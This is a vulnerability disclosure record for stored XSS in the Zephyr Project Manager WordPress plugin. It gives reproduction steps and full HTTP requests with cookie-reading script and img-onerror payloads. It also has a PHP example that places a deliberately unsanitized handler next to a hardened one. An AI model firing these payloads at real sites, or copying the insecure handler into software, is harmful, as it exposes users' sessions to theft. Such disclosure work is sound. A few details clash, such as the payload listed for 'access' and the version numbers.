Submission #45806: Zephyr Project Manager 3.2.42 - Unauthorised AJAX Calls To Stored XSS

Info

Title: Zephyr Project Manager 3.2.42 - Unauthorised AJAX Calls To Stored XSS
Description:

Zephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks.

> It has been determined that in most places throughout the application, the data from the input field can be injected as HTML without any sanitization and validation. The details of the discovery are given below.

## Proof of Concept (PoC)

The details of the various (Reflected and Stored) XSS on the application are given below.

### Endpoint Of New Discussion For Task. (Stored XSS)

Steps To Reproduce:

1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks&action=view_task&task_id=1
2. Click on the Discussion tab.
3. Fill in the payload in the comment field.
4. Click on "Comment".

Sample Request:

```http
POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks&action=view_task&task_id=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 108
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

user_id=1&subject=task&subject_id=213&message=%3cscript%3ealert(document.cookie)%3c%2fscript%3e&type=message&action=zpm_send_comment&zpm_nonce=22858bf3a7
```

Payload: %3cscript%3ealert(document.cookie)%3c%2fscript%3e

Parameter(s): message

### Endpoint Of New Team and Team Update. (Stored XSS)

Steps To Reproduce:

1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
2. Click on "New Team" or "Edit Team".
3. Fill in the payload in the team name and team description fields.
4. Click on "Create Team".

Sample Request:

```http
POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&description=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&action=zpm_add_team
```

Payload: %3cscript%3ealert(document.cookie)%3c%2fscript%3e

Parameter(s): name, description

### Endpoint Of User Access (Stored XSS)

Steps To Reproduce:

1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
2. Click on "Bulk Edit Access".
3. Choose any options.
4. Click on "Allow Access".
5. The "access" parameter is intercepted with a proxy.
6. Click on "Create Team".

Sample Request:

```http
POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1103
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

user_id%5B0%5D%5Bid%5D=1&user_id%5B0%5D%5Bemail%5D=dev-email%40flywheel.local&user_id%5B0%5D%5Bname%5D=admin&user_id%5B0%5D%5Bdescription%5D=&user_id%5B0%5D%5Bavatar%5D=https%3A%2F%2Fsecure.gravatar.com%2Favatar%2Fc2b06ae950033b392998ada50767b50e%3Fs%3D96%26d%3Dmm%26r%3Dg&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_activity%5D=0&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_tasks%5D=1&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_updates%5D=0&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_task_assigned%5D=1&user_id%5B0%5D%5Bcan_zephyr%5D=true&user_id%5B1%5D%5Bid%5D=1&user_id%5B1%5D%5Bemail%5D=dev-email%40flywheel.local&user_id%5B1%5D%5Bname%5D=admin&user_id%5B1%5D%5Bdescription%5D=&user_id%5B1%5D%5Bavatar%5D=https%3A%2F%2Fsecure.gravatar.com%2Favatar%2Fc2b06ae950033b392998ada50767b50e%3Fs%3D96%26d%3Dmm%26r%3Dg&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_activity%5D=0&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_tasks%5D=1&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_updates%5D=0&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_task_assigned%5D=1&user_id%5B1%5D%5Bcan_zephyr%5D=true&access=trueo6c2i%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3eb6lt4&action=zpm_update_user_access
```

Payload: %3cscript%3ealert(document.cookie)%3c%2fscript%3e

Parameter(s): access
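As an added example, not part of this submission and not the plugin's own code, the following shows the pattern the report describes (a request value stored and rendered as HTML with no sanitization, reachable through an admin-ajax action) next to a hardened WordPress admin-ajax handler for the same kind of "send comment" request. It assumes the WordPress runtime (check_ajax_referer(), current_user_can(), wp_kses_post(), sanitize_text_field(), absint(), esc_attr(), wp_send_json_*() and $wpdb are WordPress core APIs); the function names, the table name, the nonce action name, the capability and the allowed "subject" values are hypothetical. The request field name zpm_nonce and the action name zpm_send_comment are taken from the report's sample request.

```php
<?php
/**
 * Added example, not the plugin's code. Runs only inside WordPress.
 * Hypothetical names: zpm_example_*, the table suffix zpm_example_comments,
 * the nonce action 'zpm_example_comment' and the capability 'edit_posts'.
 */

// BEFORE (illustrative of the pattern in the report): the raw request value is
// stored and echoed as HTML, so markup in "message" runs in the browser of
// every user who later opens the discussion.
function zpm_example_insecure_send_comment() {
    global $wpdb;
    $wpdb->insert( $wpdb->prefix . 'zpm_example_comments', array(
        'subject_id' => $_POST['subject_id'],
        'message'    => $_POST['message'],              // no sanitization
    ) );
    echo '<div class="comment">' . $_POST['message'] . '</div>'; // no escaping
    wp_die();
}

// AFTER: authenticate the request, authorize the user, validate and sanitize
// on input, escape on output.
function zpm_example_secure_send_comment() {
    // 1. Reject requests that do not carry a valid nonce in the zpm_nonce
    //    field; this closes the "unauthorised AJAX call" path for this action.
    check_ajax_referer( 'zpm_example_comment', 'zpm_nonce' );

    // 2. Authorize by capability, never by the client-supplied user_id.
    if ( ! is_user_logged_in() || ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( array( 'error' => 'forbidden' ), 403 );
    }

    // 3. Validate and sanitize each field according to its expected type.
    $subject_id = isset( $_POST['subject_id'] ) ? absint( $_POST['subject_id'] ) : 0;
    $subject    = isset( $_POST['subject'] )
        ? sanitize_text_field( wp_unslash( $_POST['subject'] ) ) : '';
    // wp_kses_post() keeps only the HTML subset WordPress allows in post
    // content; <script>, <img onerror=...> and other event handlers are removed.
    $message    = isset( $_POST['message'] )
        ? wp_kses_post( wp_unslash( $_POST['message'] ) ) : '';

    // 'task' appears in the report's request; 'project' is an assumed value.
    $allowed_subjects = array( 'task', 'project' );
    if ( 0 === $subject_id
        || ! in_array( $subject, $allowed_subjects, true )
        || '' === trim( $message ) ) {
        wp_send_json_error( array( 'error' => 'invalid input' ), 400 );
    }

    // 4. Store with explicit formats. $wpdb->insert() protects the SQL layer
    //    only; it does nothing for HTML, so step 3 and step 5 are still needed.
    global $wpdb;
    $wpdb->insert(
        $wpdb->prefix . 'zpm_example_comments',
        array(
            'user_id'    => get_current_user_id(),
            'subject'    => $subject,
            'subject_id' => $subject_id,
            'message'    => $message,
        ),
        array( '%d', '%s', '%d', '%s' )
    );

    // 5. Escape on output as well: esc_attr() for attribute context,
    //    wp_kses_post() for the rich-text body.
    $html = '<div class="comment" data-subject="' . esc_attr( $subject ) . '">'
          . wp_kses_post( $message )
          . '</div>';

    wp_send_json_success( array( 'html' => $html ) );
}

// Register for logged-in users only; no wp_ajax_nopriv_ hook is added, so
// anonymous requests to this action get WordPress's default "0" response.
add_action( 'wp_ajax_zpm_send_comment', 'zpm_example_secure_send_comment' );
```

The same three controls (nonce check, capability check, type-appropriate sanitization plus output escaping) apply to the team name/description and access parameters in the other two requests; for fields that should never contain markup, replace wp_kses_post() with sanitize_text_field() on input and esc_html() on output.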
Source: https://wpscan.com/vulnerability/bfd8a7aa-5977-4fe5-b2fc-12bf93caf3ed

User: r1z4x (UID 31999)

Submitted: 2022-09-13 02:39 PM (4 years ago)

Moderation: 2022-09-23 08:58 AM (10 days later)

Status: Accepted

VulDB Entry: 209370 [Zephyr Project Manager up to 3.2.4 on WordPress REST Call /v1/tasks/create/ onanimationstart cross site scripting]

Points: 20
